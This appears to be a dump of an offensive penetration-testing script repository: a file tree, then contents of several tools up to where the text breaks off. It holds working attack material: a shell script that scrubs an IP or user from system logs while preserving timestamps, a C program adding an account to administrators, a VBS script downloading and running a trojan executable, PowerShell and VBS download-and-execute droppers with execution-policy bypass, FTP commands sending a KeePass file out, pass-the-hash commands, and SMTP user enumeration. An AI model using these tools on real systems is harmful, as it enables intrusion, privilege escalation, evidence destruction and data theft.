├── .DS_Store ├── Burp Suite Extender.md ├── Cleaning └── linux_clean.sh ├── Command └── Useradd.c ├── Exploit_write ├── findbadchar.md └── findbadchar.py ├── FileTransfer ├── FTP │ ├── ftpserver.md │ └── ftpserver.py ├── HttpServer │ ├── SimpleHttpUpload.py │ ├── SimpleHttpUpload_readme.txt │ └── one-liners webserver ├── ftp.txt ├── powershell_download.txt ├── tinyfilemanager.php └── windows │ ├── downlaod.vbs │ ├── wget.ps1 │ ├── wget.vbs │ └── wget1.ps1 ├── Mail ├── SMTP_User_Enum.py ├── receive_mail.py └── receive_mail_ssl.py ├── PSExec └── psexec_toolist.txt ├── PTH ├── autocheck_pth.sh └── pth-winexe.txt ├── PasswordCrack ├── zipcrack.py └── zipcrack.sh ├── PortFwd └── README.md ├── PrivilegeEscalation ├── Linux │ └── ps_history.sh └── Windows │ ├── Hash │ └── vssown.vbs │ ├── README.md │ ├── WinPrivCheck.bat │ ├── jollyfrogs-batch.bat │ └── ms16_032_intrd_mod.ps1 ├── Python ├── .DS_Store ├── auto_get_proxy │ ├── proxies.txt │ ├── run.py │ └── user_agents.txt ├── bugscan_run.py ├── cdn_identify.py ├── drcom2.6.py ├── port_knocking.py ├── port_knocking.sh ├── readlog │ ├── read.txt │ └── readlog.py ├── shodan │ ├── .DS_Store │ ├── get.py │ └── search.py ├── top500 │ ├── Top100Pwd.txt │ ├── Top500Name.txt │ ├── Top500Name_cn.txt │ ├── main.py │ ├── pinyin │ │ ├── __init__.py │ │ ├── __init__.pyc │ │ └── chars.txt │ └── top10W │ │ └── top10W.txt ├── 修改文件名 │ ├── 加后缀.py │ └── 改成特定文件名.py.txt ├── 修改文件时间戳 │ ├── 单个.py │ └── 批量当前目录.py ├── 单个替换xml.py ├── 处理iispwd │ └── a.py ├── 批量替换xml.py ├── 目录扫描整理 │ ├── Thumbs.db │ ├── del.py │ ├── temp.xxoo │ ├── 删除乱码.py │ ├── 删除同名hash同.py │ └── 删除文件重复的行.py ├── 脱裤py脚本 │ └── 自定义cookie批量GET(POST).py └── 遍历子目录和路径.py ├── README.md ├── Recon-windows ├── iis.vbs ├── osinfo.vbs ├── ping.vbs └── user_detail_info.vbs ├── ReverseShell ├── php-reverse-shell ├── php-reverse-shell.php ├── revbshell │ ├── LICENSE │ ├── README.md │ ├── client.vbs │ └── server.py └── vbs-reverse-shell │ ├── LICENSE │ ├── README.rst │ ├── reverse_shell.vbs │ └── server.py ├── RunAs ├── RunAsSpc.txt ├── runas.ps1 └── schtasks.txt ├── SMB └── net_share_brute_force.txt ├── SNMP └── scan.txt ├── Web ├── Domain │ └── bing_api.py └── Recon │ └── simple_wp_check.py ├── WebExp └── DotNetPaddingAttack.py ├── bat ├── cmd压缩解压 │ ├── atzip.bat │ ├── readme.bat │ ├── unzip.exe │ ├── wwwroot │ │ ├── atzip.bat │ │ └── zip.exe │ └── zip.exe ├── dsquery ou 所有pc │ ├── allou.txt │ └── test.bat ├── exe可否执行 │ ├── a.exe │ └── test.txt ├── net_use.bat ├── ping │ ├── netview1.txt │ └── test1.bat ├── pingbat.bat ├── 收集系统信息.bat └── 遍历所有子目录子文件 │ ├── xlc.bat │ └── xlc.txt ├── port_scan └── tcpportlist.txt ├── quickput.py └── vbs ├── finddomaincontrol.vbs ├── iis.vbs ├── osinfo.vbs ├── ping.vbs ├── windows获得所有本地账户信息 └── ff.vbs └── 收集系统信息.bat /.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoxiaoleo/pentest-script/c3f5896da18aa0b18d0a133e937ce5c5a86f7e53/.DS_Store -------------------------------------------------------------------------------- /Burp Suite Extender.md: -------------------------------------------------------------------------------- 1 | # Burp Suite Extender 2 | 3 | 1. Flow, 纪录repeater请求历史 4 | 5 | 2. Mark different browser, 标记不同浏览器,用于多用户权限测试 6 | 7 | -------------------------------------------------------------------------------- /Cleaning/linux_clean.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | echo " linux clear log " 3 | echo " by knlve 2008-08-29" 4 | echo "===============================" 5 | # chmod 777 log 6 | # ./log xx.xx.xx.xx And ./log root 7 | if [ -f "/var/log/wtmp" ];then 8 | cat /var/log/wtmp | grep -v $1 >> /var/log/temp1; 9 | chgrp --reference /var/log/wtmp /var/log/temp1; 10 | chown --reference /var/log/wtmp /var/log/temp1; 11 | touch -r /var/log/wtmp /var/log/temp1; 12 | mv -f /var/log/temp1 /var/log/wtmp; 13 | fi 14 | if [ -f "/var/log/lastlog" ];then 15 | cat /var/log/lastlog |grep -v $1 >> /var/log/temp2; 16 | chgrp --reference /var/log/lastlog /var/log/temp2; 17 | chown --reference /var/log/lastlog /var/log/temp2; 18 | touch -r /var/log/lastlog /var/log/temp2; 19 | mv -f /var/log/temp2 /var/log/lastlog; 20 | fi 21 | if [ -f "/var/log/messages" ];then 22 | cat /var/log/messages | grep -v $1 >> /var/log/temp3; 23 | chgrp --reference /var/log/messages /var/log/temp3; 24 | chown --reference /var/log/messages /var/log/temp3; 25 | touch -r /var/log/messages /var/log/temp3; 26 | mv -f /var/log/temp3 /var/log/messages; 27 | fi 28 | if [ -f "/var/log/utmp" ];then 29 | cat /var/log/utmp | grep -v $1 >> /var/log/temp4; 30 | chgrp --reference /var/log/utmp /var/log/temp4; 31 | chown --reference /var/log/utmp /var/log/temp4; 32 | touch -r /var/log/utmp /var/log/temp4; 33 | mv -f /var/log/temp4 /var/log/utmp; 34 | fi 35 | if [ -f "/var/log/wtmpx" ];then 36 | cat /var/log/wtmpx | grep -v $1 >> /var/log/temp5; 37 | chgrp --reference /var/log/wtmpx /var/log/temp5; 38 | chown --reference /var/log/wtmpx /var/log/temp5; 39 | touch -r /var/log/wtmpx /var/log/temp5; 40 | mv -f /var/log/temp5 /var/log/wtmpx; 41 | fi if [ -f "/var/log/utmpx" ];then 42 | cat /var/log/utmpx | grep -v $1 >> /var/log/temp6; 43 | chgrp --reference /var/log/utmpx /var/log/temp6; 44 | chown --reference /var/log/utmpx /var/log/temp6; 45 | touch -r /var/log/utmpx /var/log/temp6; 46 | mv -f /var/log/temp6 /var/log/utmpx; 47 | fi 48 | if [ -f "/var/log/syslog" ];then 49 | cat /var/log/syslog | grep -v $1 >> /var/log/temp7; 50 | chgrp --reference /var/log/syslog /var/log/temp7; 51 | chown --reference /var/log/syslog /var/log/temp7; 52 | touch -r /var/log/syslog /var/log/temp7; 53 | mv -f /var/log/temp7 /var/log/syslog; 54 | fi 55 | if [ -f "/var/log/secure" ];then 56 | cat /var/log/secure | grep -v $1 >> /var/log/temp8; 57 | chgrp --reference /var/log/secure /var/log/temp8; 58 | chown --reference /var/log/secure /var/log/temp8; 59 | touch -r /var/log/secure /var/log/temp8; 60 | mv -f /var/log/temp8 /var/log/secure; 61 | fi 62 | /usr/bin/killall -HUP syslogd; 63 | echo "Clear log is success! 64 | #rm -fr log 65 | -------------------------------------------------------------------------------- /Command/Useradd.c: -------------------------------------------------------------------------------- 1 | #include /* system, NULL, EXIT_FAILURE */ 2 | int main () 3 | { 4 | int i; 5 | i=system ("net localgroup administrators low /add"); 6 | return 0; 7 | } 8 | -------------------------------------------------------------------------------- /Exploit_write/findbadchar.md: -------------------------------------------------------------------------------- 1 | 2 | ###### USAGE 3 | 4 | 1. In Immunity Debugger, Select the compared memory Copy to clipboard. 5 | 2. Save memory to mem.txt 6 | 3. Set start compare point value 7 | 4. Run with findbadchar.py star_compare_point 8 | -------------------------------------------------------------------------------- /Exploit_write/findbadchar.py: -------------------------------------------------------------------------------- 1 | #author : github.com/xiaoxiaoleo 2 | 3 | from __future__ import print_function 4 | import re 5 | import sys 6 | 7 | compare_point=int(sys.argv[1]) 8 | 9 | 10 | orign_lst = ['01', '02', '03', '04', '05', '06', '07', '08', '09', '0A', '0B', '0C', '0D', '0E', '0F', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '1A', '1B', '1C', '1D', '1E', '1F', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '2A', '2B', '2C', '2D', '2E', '2F', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '3A', '3B', '3C', '3D', '3E', '3F', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '4A', '4B', '4C', '4D', '4E', '4F', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '5A', '5B', '5C', '5D', '5E', '5F', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '6A', '6B', '6C', '6D', '6E', '6F', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '7A', '7B', '7C', '7D', '7E', '7F', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '8A', '8B', '8C', '8D', '8E', '8F', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '9A', '9B', '9C', '9D', '9E', '9F', 'A0', 'A1', 'A2', 'A3', 'A4', 'A5', 'A6', 'A7', 'A8', 'A9', 'AA', 'AB', 'AC', 'AD', 'AE', 'AF', 'B0', 'B1', 'B2', 'B3', 'B4', 'B5', 'B6', 'B7', 'B8', 'B9', 'BA', 'BB', 'BC', 'BD', 'BE', 'BF', 'C0', 'C1', 'C2', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'C9', 'CA', 'CB', 'CC', 'CD', 'CE', 'CF', 'D0', 'D1', 'D2', 'D3', 'D4', 'D5', 'D6', 'D7', 'D8', 'D9', 'DA', 'DB', 'DC', 'DD', 'DE', 'DF', 'E0', 'E1', 'E2', 'E3', 'E4', 'E5', 'E6', 'E7', 'E8', 'E9', 'EA', 'EB', 'EC', 'ED', 'EE', 'EF', 'F0', 'F1', 'F2', 'F3', 'F4', 'F5', 'F6', 'F7', 'F8', 'F9', 'FA', 'FB', 'FC', 'FD', 'FE', 'FF'] 11 | 12 | 13 | def reorder(mystr): 14 | tmp = {} 15 | tmp[0] = mystr[0:2] 16 | tmp[1] = mystr[2:4] 17 | tmp[2] = mystr[4:6] 18 | tmp[3] = mystr[6:8] 19 | return [tmp[3],tmp[2],tmp[1],tmp[0]] 20 | 21 | def genhex(mystr): 22 | b=re.findall(r'.{2}',mystr) 23 | c='\\x'.join(b) 24 | print(c) 25 | 26 | def print_badchar(orign_lst, mem_lst, compare_point): 27 | print (15 * '--') 28 | for i in range(0, len(orign_lst)): 29 | print (orign_lst[i], mem_lst[i + compare_point]) 30 | 31 | print (15 * '--') 32 | for i in range(0, len(orign_lst)): 33 | if orign_lst[i] != mem_lst[i + compare_point]: 34 | print (orign_lst[i], ' - ', mem_lst[i + compare_point]) 35 | print (15 * '--') 36 | bad_str = '' 37 | for i in range(0, len(orign_lst)): 38 | if orign_lst[i] != mem_lst[i + compare_point]: 39 | bad_str += orign_lst[i] 40 | genhex(bad_str) 41 | 42 | 43 | if __name__ == '__main__': 44 | mem = open('mem.txt') 45 | mem_list = [] 46 | mem_lst = [] 47 | for i in mem: 48 | l = i.split(' ') 49 | if len(l) > 4: 50 | mem_list.append(l[3]) 51 | mem_lst.extend(reorder(l[3])) 52 | print_badchar(orign_lst, mem_lst, compare_point) 53 | mem.close() 54 | -------------------------------------------------------------------------------- /FileTransfer/FTP/ftpserver.md: -------------------------------------------------------------------------------- 1 | #### FTP Server: 2 | 3 | apt-get install python-pyftpdlib 4 | 5 | python ftpserver.py 6 | 7 | username:test 8 | password:test 9 | 10 | 11 | #### Windows7 12 | 13 | echo open 10.10.14.168 21> ftp.txt 14 | echo user test test>> ftp.txt 15 | echo help>> ftp.txt 16 | echo put CEH.kdbx >> ftp.txt 17 | echo bye >> ftp.txt 18 | ftp -v -n -s:ftp.txt 19 | 20 | -------------------------------------------------------------------------------- /FileTransfer/FTP/ftpserver.py: -------------------------------------------------------------------------------- 1 | from pyftpdlib.authorizers import DummyAuthorizer 2 | from pyftpdlib.handlers import FTPHandler 3 | from pyftpdlib.servers import FTPServer 4 | 5 | 6 | # The port the FTP server will listen on. 7 | # This must be greater than 1023 unless you run this script as root. 8 | FTP_PORT = 21 9 | 10 | # The name of the FTP user that can log in. 11 | FTP_USER = "test" 12 | 13 | # The FTP user's password. 14 | FTP_PASSWORD = "test" 15 | 16 | # The directory the FTP user will have full read/write access to. 17 | FTP_DIRECTORY = "." 18 | 19 | 20 | def main(): 21 | authorizer = DummyAuthorizer() 22 | 23 | # Define a new user having full r/w permissions. 24 | authorizer.add_user(FTP_USER, FTP_PASSWORD, FTP_DIRECTORY, perm='elradfmw') 25 | 26 | handler = FTPHandler 27 | handler.authorizer = authorizer 28 | 29 | # Define a customized banner (string returned when client connects) 30 | handler.banner = "pyftpdlib based ftpd ready." 31 | 32 | # Optionally specify range of ports to use for passive connections. 33 | #handler.passive_ports = range(60000, 65535) 34 | 35 | address = ('', FTP_PORT) 36 | server = FTPServer(address, handler) 37 | 38 | server.max_cons = 256 39 | server.max_cons_per_ip = 5 40 | 41 | server.serve_forever() 42 | 43 | 44 | if __name__ == '__main__': 45 | main() 46 | -------------------------------------------------------------------------------- /FileTransfer/HttpServer/SimpleHttpUpload.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | """Simple HTTP Server With Upload. 4 | This module builds on BaseHTTPServer by implementing the standard GET 5 | and HEAD requests in a fairly straightforward manner. 6 | see: https://gist.github.com/UniIsland/3346170 7 | """ 8 | 9 | 10 | __version__ = "0.1" 11 | __all__ = ["SimpleHTTPRequestHandler"] 12 | __author__ = "bones7456" 13 | __home_page__ = "http://li2z.cn/" 14 | 15 | import os 16 | import posixpath 17 | import http.server 18 | import urllib.request, urllib.parse, urllib.error 19 | import cgi 20 | import shutil 21 | import mimetypes 22 | import re 23 | from io import BytesIO 24 | 25 | 26 | class SimpleHTTPRequestHandler(http.server.BaseHTTPRequestHandler): 27 | 28 | """Simple HTTP request handler with GET/HEAD/POST commands. 29 | This serves files from the current directory and any of its 30 | subdirectories. The MIME type for files is determined by 31 | calling the .guess_type() method. And can reveive file uploaded 32 | by client. 33 | The GET/HEAD/POST requests are identical except that the HEAD 34 | request omits the actual contents of the file. 35 | """ 36 | 37 | server_version = "SimpleHTTPWithUpload/" + __version__ 38 | 39 | def do_GET(self): 40 | """Serve a GET request.""" 41 | f = self.send_head() 42 | if f: 43 | self.copyfile(f, self.wfile) 44 | f.close() 45 | 46 | def do_HEAD(self): 47 | """Serve a HEAD request.""" 48 | f = self.send_head() 49 | if f: 50 | f.close() 51 | 52 | def do_POST(self): 53 | """Serve a POST request.""" 54 | r, info = self.deal_post_data() 55 | print((r, info, "by: ", self.client_address)) 56 | f = BytesIO() 57 | f.write(b'') 58 | f.write(b"\nUpload Result Page\n") 59 | f.write(b"\n

Upload Result Page

\n") 60 | f.write(b"
\n") 61 | if r: 62 | f.write(b"Success:") 63 | else: 64 | f.write(b"Failed:") 65 | f.write(info.encode()) 66 | f.write(("
back" % self.headers['referer']).encode()) 67 | f.write(b"
Powerd By: bones7456, check new version at ") 68 | f.write(b"") 69 | f.write(b"here.\n\n") 70 | length = f.tell() 71 | f.seek(0) 72 | self.send_response(200) 73 | self.send_header("Content-type", "text/html") 74 | self.send_header("Content-Length", str(length)) 75 | self.end_headers() 76 | if f: 77 | self.copyfile(f, self.wfile) 78 | f.close() 79 | 80 | def deal_post_data(self): 81 | content_type = self.headers['content-type'] 82 | if not content_type: 83 | return (False, "Content-Type header doesn't contain boundary") 84 | boundary = content_type.split("=")[1].encode() 85 | remainbytes = int(self.headers['content-length']) 86 | line = self.rfile.readline() 87 | remainbytes -= len(line) 88 | if not boundary in line: 89 | return (False, "Content NOT begin with boundary") 90 | line = self.rfile.readline() 91 | remainbytes -= len(line) 92 | fn = re.findall(r'Content-Disposition.*name="file"; filename="(.*)"', line.decode()) 93 | if not fn: 94 | return (False, "Can't find out file name...") 95 | path = self.translate_path(self.path) 96 | fn = os.path.join(path, fn[0]) 97 | line = self.rfile.readline() 98 | remainbytes -= len(line) 99 | line = self.rfile.readline() 100 | remainbytes -= len(line) 101 | try: 102 | out = open(fn, 'wb') 103 | except IOError: 104 | return (False, "Can't create file to write, do you have permission to write?") 105 | 106 | preline = self.rfile.readline() 107 | remainbytes -= len(preline) 108 | while remainbytes > 0: 109 | line = self.rfile.readline() 110 | remainbytes -= len(line) 111 | if boundary in line: 112 | preline = preline[0:-1] 113 | if preline.endswith(b'\r'): 114 | preline = preline[0:-1] 115 | out.write(preline) 116 | out.close() 117 | return (True, "File '%s' upload success!" % fn) 118 | else: 119 | out.write(preline) 120 | preline = line 121 | return (False, "Unexpect Ends of data.") 122 | 123 | def send_head(self): 124 | """Common code for GET and HEAD commands. 125 | This sends the response code and MIME headers. 126 | Return value is either a file object (which has to be copied 127 | to the outputfile by the caller unless the command was HEAD, 128 | and must be closed by the caller under all circumstances), or 129 | None, in which case the caller has nothing further to do. 130 | """ 131 | path = self.translate_path(self.path) 132 | f = None 133 | if os.path.isdir(path): 134 | if not self.path.endswith('/'): 135 | # redirect browser - doing basically what apache does 136 | self.send_response(301) 137 | self.send_header("Location", self.path + "/") 138 | self.end_headers() 139 | return None 140 | for index in "index.html", "index.htm": 141 | index = os.path.join(path, index) 142 | if os.path.exists(index): 143 | path = index 144 | break 145 | else: 146 | return self.list_directory(path) 147 | ctype = self.guess_type(path) 148 | try: 149 | # Always read in binary mode. Opening files in text mode may cause 150 | # newline translations, making the actual size of the content 151 | # transmitted *less* than the content-length! 152 | f = open(path, 'rb') 153 | except IOError: 154 | self.send_error(404, "File not found") 155 | return None 156 | self.send_response(200) 157 | self.send_header("Content-type", ctype) 158 | fs = os.fstat(f.fileno()) 159 | self.send_header("Content-Length", str(fs[6])) 160 | self.send_header("Last-Modified", self.date_time_string(fs.st_mtime)) 161 | self.end_headers() 162 | return f 163 | 164 | def list_directory(self, path): 165 | """Helper to produce a directory listing (absent index.html). 166 | Return value is either a file object, or None (indicating an 167 | error). In either case, the headers are sent, making the 168 | interface the same as for send_head(). 169 | """ 170 | try: 171 | list = os.listdir(path) 172 | except os.error: 173 | self.send_error(404, "No permission to list directory") 174 | return None 175 | list.sort(key=lambda a: a.lower()) 176 | f = BytesIO() 177 | displaypath = cgi.escape(urllib.parse.unquote(self.path)) 178 | f.write(b'') 179 | f.write(("\nDirectory listing for %s\n" % displaypath).encode()) 180 | f.write(("\n

Directory listing for %s

\n" % displaypath).encode()) 181 | f.write(b"
\n") 182 | f.write(b"
") 183 | f.write(b"") 184 | f.write(b"
\n") 185 | f.write(b"
\n\n
\n\n\n") 199 | length = f.tell() 200 | f.seek(0) 201 | self.send_response(200) 202 | self.send_header("Content-type", "text/html") 203 | self.send_header("Content-Length", str(length)) 204 | self.end_headers() 205 | return f 206 | 207 | def translate_path(self, path): 208 | """Translate a /-separated PATH to the local filename syntax. 209 | Components that mean special things to the local file system 210 | (e.g. drive or directory names) are ignored. (XXX They should 211 | probably be diagnosed.) 212 | """ 213 | # abandon query parameters 214 | path = path.split('?',1)[0] 215 | path = path.split('#',1)[0] 216 | path = posixpath.normpath(urllib.parse.unquote(path)) 217 | words = path.split('/') 218 | words = [_f for _f in words if _f] 219 | path = os.getcwd() 220 | for word in words: 221 | drive, word = os.path.splitdrive(word) 222 | head, word = os.path.split(word) 223 | if word in (os.curdir, os.pardir): continue 224 | path = os.path.join(path, word) 225 | return path 226 | 227 | def copyfile(self, source, outputfile): 228 | """Copy all data between two file objects. 229 | The SOURCE argument is a file object open for reading 230 | (or anything with a read() method) and the DESTINATION 231 | argument is a file object open for writing (or 232 | anything with a write() method). 233 | The only reason for overriding this would be to change 234 | the block size or perhaps to replace newlines by CRLF 235 | -- note however that this the default server uses this 236 | to copy binary data as well. 237 | """ 238 | shutil.copyfileobj(source, outputfile) 239 | 240 | def guess_type(self, path): 241 | """Guess the type of a file. 242 | Argument is a PATH (a filename). 243 | Return value is a string of the form type/subtype, 244 | usable for a MIME Content-type header. 245 | The default implementation looks the file's extension 246 | up in the table self.extensions_map, using application/octet-stream 247 | as a default; however it would be permissible (if 248 | slow) to look inside the data to make a better guess. 249 | """ 250 | 251 | base, ext = posixpath.splitext(path) 252 | if ext in self.extensions_map: 253 | return self.extensions_map[ext] 254 | ext = ext.lower() 255 | if ext in self.extensions_map: 256 | return self.extensions_map[ext] 257 | else: 258 | return self.extensions_map[''] 259 | 260 | if not mimetypes.inited: 261 | mimetypes.init() # try to read system mime.types 262 | extensions_map = mimetypes.types_map.copy() 263 | extensions_map.update({ 264 | '': 'application/octet-stream', # Default 265 | '.py': 'text/plain', 266 | '.c': 'text/plain', 267 | '.h': 'text/plain', 268 | }) 269 | 270 | 271 | def test(HandlerClass = SimpleHTTPRequestHandler, 272 | ServerClass = http.server.HTTPServer): 273 | http.server.test(HandlerClass, ServerClass) 274 | 275 | if __name__ == '__main__': 276 | test() 277 | -------------------------------------------------------------------------------- /FileTransfer/HttpServer/SimpleHttpUpload_readme.txt: -------------------------------------------------------------------------------- 1 | root@kali:~/pentest-script/FileTransfer/HttpServer# python3 SimpleHttpUpload.py 2 | 3 | CURL 4 | root@kali:~/Desktop# curl -F file=@/root/Desktop/test.zip http://127.0.0.1:8000/ 5 | 6 | PowerShell 7 | $fileName = "mo.zip" 8 | $uri = "http://192.168.224.129:8000/" 9 | $currentPath = Convert-Path . 10 | $filePath="$currentPath\$fileName" 11 | $fileBin = [System.IO.File]::ReadAlltext($filePath) 12 | $bodyLines = ("------------------------83cdc2d56002d24a","Content-Disposition: form-data; name=`"file`"; filename=`"$fileName`"","Content-Type: application/octet-stream;",$fileBin,"--------------------------83cdc2d56002d24a--$LF" ) -join "`r`n" 13 | 14 | Invoke-RestMethod -Uri $uri -Method Post -ContentType "multipart/form-data; boundary=------------------------83cdc2d56002d24a" -Body $bodyLines 15 | 16 | 17 | -------------------------------------------------------------------------------- /FileTransfer/HttpServer/one-liners webserver: -------------------------------------------------------------------------------- 1 | python -m SimpleHTTPServer 2 | python3 -m http.server 3 | ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start" 4 | php -S 0.0.0.0:8888 5 | -------------------------------------------------------------------------------- /FileTransfer/ftp.txt: -------------------------------------------------------------------------------- 1 | echo open 10.11.0.138 21> ftp.txt 2 | echo USER offsec>> ftp.txt 3 | echo ftp>> ftp.txt 4 | echo bin >> ftp.txt 5 | echo GET/PUT nc.exe >> ftp.txt 6 | echo bye >> ftp.txt 7 | ftp -v -n -s:ftp.txt 8 | -------------------------------------------------------------------------------- /FileTransfer/powershell_download.txt: -------------------------------------------------------------------------------- 1 | C:\HFS>powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.x.x.x/runasspc.exe','c:\users\public\runaa.exe') 2 | 3 | C:\Users\kostas\Desktop> powershell -c "Invoke-WebRequest -Uri http://10.10.15.150/41020.exe -OutFile C:\Users\kostas\Desktop\41020.exe" 4 | -------------------------------------------------------------------------------- /FileTransfer/windows/downlaod.vbs: -------------------------------------------------------------------------------- 1 | Set Post = CreateObject("Msxml2.XMLHTTP") 2 | Set Shell = CreateObject("Wscript.Shell") 3 | Post.Open "GET","http://www.xxx.com/muma.exe",0 4 | Post.Send() 5 | Set aGet = CreateObject("ADODB.Stream") 6 | aGet.Mode = 3 7 | aGet.Type = 1 8 | aGet.Open() 9 | aGet.Write(Post.responseBody) 10 | aGet.SaveToFile "c:\windows\temp\TS.exe",2 11 | wscript.sleep 1000 12 | Shell.Run ("c:\windows\temp\TS.exe") '延迟过后执行下载文件 13 | -------------------------------------------------------------------------------- /FileTransfer/windows/wget.ps1: -------------------------------------------------------------------------------- 1 | echo $url = $args[0] > wget.ps1 2 | echo $output = "$($pwd)\$($args[1])" >> wget.ps1 3 | echo $wc = New-Object System.Net.WebClient >> wget.ps1 4 | echo $wc.DownloadFile($url, $output) >> wget.ps1 5 | 6 | #usage 7 | #powershell.exe -ExecutionPolicy bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 http://x.x.x.x filename 8 | -------------------------------------------------------------------------------- /FileTransfer/windows/wget.vbs: -------------------------------------------------------------------------------- 1 | echo strUrl = WScript.Arguments.Item(0) > wget.vbs 2 | echo StrFile = WScript.Arguments.Item(1) >> wget.vbs 3 | echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs 4 | echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs 5 | echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs 6 | echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs 7 | echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs 8 | echo Err.Clear >> wget.vbs 9 | echo Set http = Nothing >> wget.vbs 10 | echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs 11 | echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs 12 | echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs 13 | echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs 14 | echo http.Open "GET",strURL,False >> wget.vbs 15 | echo http.Send >> wget.vbs 16 | echo varByteArray = http.ResponseBody >> wget.vbs 17 | echo Set http = Nothing >> wget.vbs 18 | echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs 19 | echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs 20 | echo strData = "" >> wget.vbs 21 | echo strBuffer = "" >> wget.vbs 22 | echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs 23 | echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs 24 | echo Next >> wget.vbs 25 | echo ts.Close >> wget.vbs 26 | 27 | 28 | #After you've created wget.vbs 29 | #cscript wget.vbs http://192.168.10.5/evil.exe evil.exe 30 | -------------------------------------------------------------------------------- /FileTransfer/windows/wget1.ps1: -------------------------------------------------------------------------------- 1 | #! /usr/bin/python 2 | 3 | import sys 4 | 5 | if len(sys.argv) !=3: 6 | print "Usage: gen_ps1_wget.py " 7 | sys.exit(0) 8 | print "\n" 9 | print "Copy and paste the following in to the host:" 10 | print "\n" 11 | print "echo $storageDir = $pwd > wget.ps1" 12 | print "echo $webclient = New-Object System.Net.WebClient >> wget.ps1" 13 | print "echo $url = 'http://%s/%s' >> wget.ps1"%(sys.argv[1],sys.argv[2]) 14 | print "echo $file = '%s' >> wget.ps1" % sys.argv[2] 15 | print "echo $webclient.DownloadFile($url,$file) >> wget.ps1" 16 | print "\n" 17 | 18 | #powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 19 | -------------------------------------------------------------------------------- /Mail/SMTP_User_Enum.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # SMPT username enumeration (VRFY) script 3 | import socket 4 | import sys 5 | 6 | if len(sys.argv) !=2: 7 | print "Usage: vrfy.py " 8 | sys.exit(0) 9 | 10 | #create socket 11 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 12 | #connect to socket 13 | connect = s.connect(('10.11.1.217',25)) 14 | #receive banner 15 | banner = s.recv(1024) 16 | print banner 17 | #VRFY user 18 | s.send('VRFY' + sys.argv[1] + '\r\n') 19 | result = s.recv(1024) 20 | print result 21 | #close the socket 22 | s.close() 23 | -------------------------------------------------------------------------------- /Mail/receive_mail.py: -------------------------------------------------------------------------------- 1 | 2 | import poplib 3 | pop3server = 'pop.gmail.com' 4 | username = 'username@gmail.com' 5 | password = 'your_password' 6 | pop3server = poplib.POP3(pop3server) # open connection 7 | print (pop3server.getwelcome()) #show welcome message 8 | pop3server.user(username) 9 | pop3server.pass_(password) 10 | pop3info = pop3server.stat() #access mailbox status 11 | mailcount = pop3info[0] #toral email 12 | print("Total no. of Email : " , mailcount) 13 | print ("\n\nStart Reading Messages\n\n") 14 | for i in range(mailcount): 15 | for message in pop3server.retr(i+1)[1]: 16 | print (message) 17 | pop3server.quit() 18 | 19 | -------------------------------------------------------------------------------- /Mail/receive_mail_ssl.py: -------------------------------------------------------------------------------- 1 | 2 | import poplib 3 | pop3server = 'pop.gmail.com' 4 | username = 'username@gmail.com' 5 | password = 'your_password' 6 | pop3server = poplib.POP3_SSL(pop3server) # open connection 7 | print (pop3server.getwelcome()) #show welcome message 8 | pop3server.user(username) 9 | pop3server.pass_(password) 10 | pop3info = pop3server.stat() #access mailbox status 11 | mailcount = pop3info[0] #toral email 12 | print("Total no. of Email : " , mailcount) 13 | print ("\n\nStart Reading Messages\n\n") 14 | for i in range(mailcount): 15 | for message in pop3server.retr(i+1)[1]: 16 | print (message) 17 | pop3server.quit() 18 | -------------------------------------------------------------------------------- /PSExec/psexec_toolist.txt: -------------------------------------------------------------------------------- 1 | root@kali:# /usr/share/doc/python-impacket/examples/wmiexec.py -hashes x:x alice@x.x.x.x 2 | root@kali:~/Desktop# pth-winexe -U 3 | Fubar%aad3b435b51404eeaad3b435b51404ee:8119935c5f7fa5f57135620c8073aaca //192.168.187.135 cmd 4 | 5 | 6 | 7 | REF: 8 | https://www.trustedsec.com/2015/06/no_psexec_needed/MSF 9 | 10 | PSexec – http://www.rapid7.com/db/modules/exploit/windows/smb/psexec 11 | Sysinternal PSexec – https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx 12 | SMbexec – https://github.com/pentestgeek/smbexec 13 | Winexe – http://sourceforge.net/projects/winexe/ 14 | PtH tool kit – https://code.google.com/p/passing-the-hash/downloads/list 15 | Impacket – https://github.com/coresecurity/impacket 16 | WMIS: The Missing Piece of the Ownage Puzzle – http://passing-the-hash.blogspot.com/2013/07/WMIS-PowerSploit-Shells.html 17 | -------------------------------------------------------------------------------- /PTH/autocheck_pth.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Author: Daniel Torres 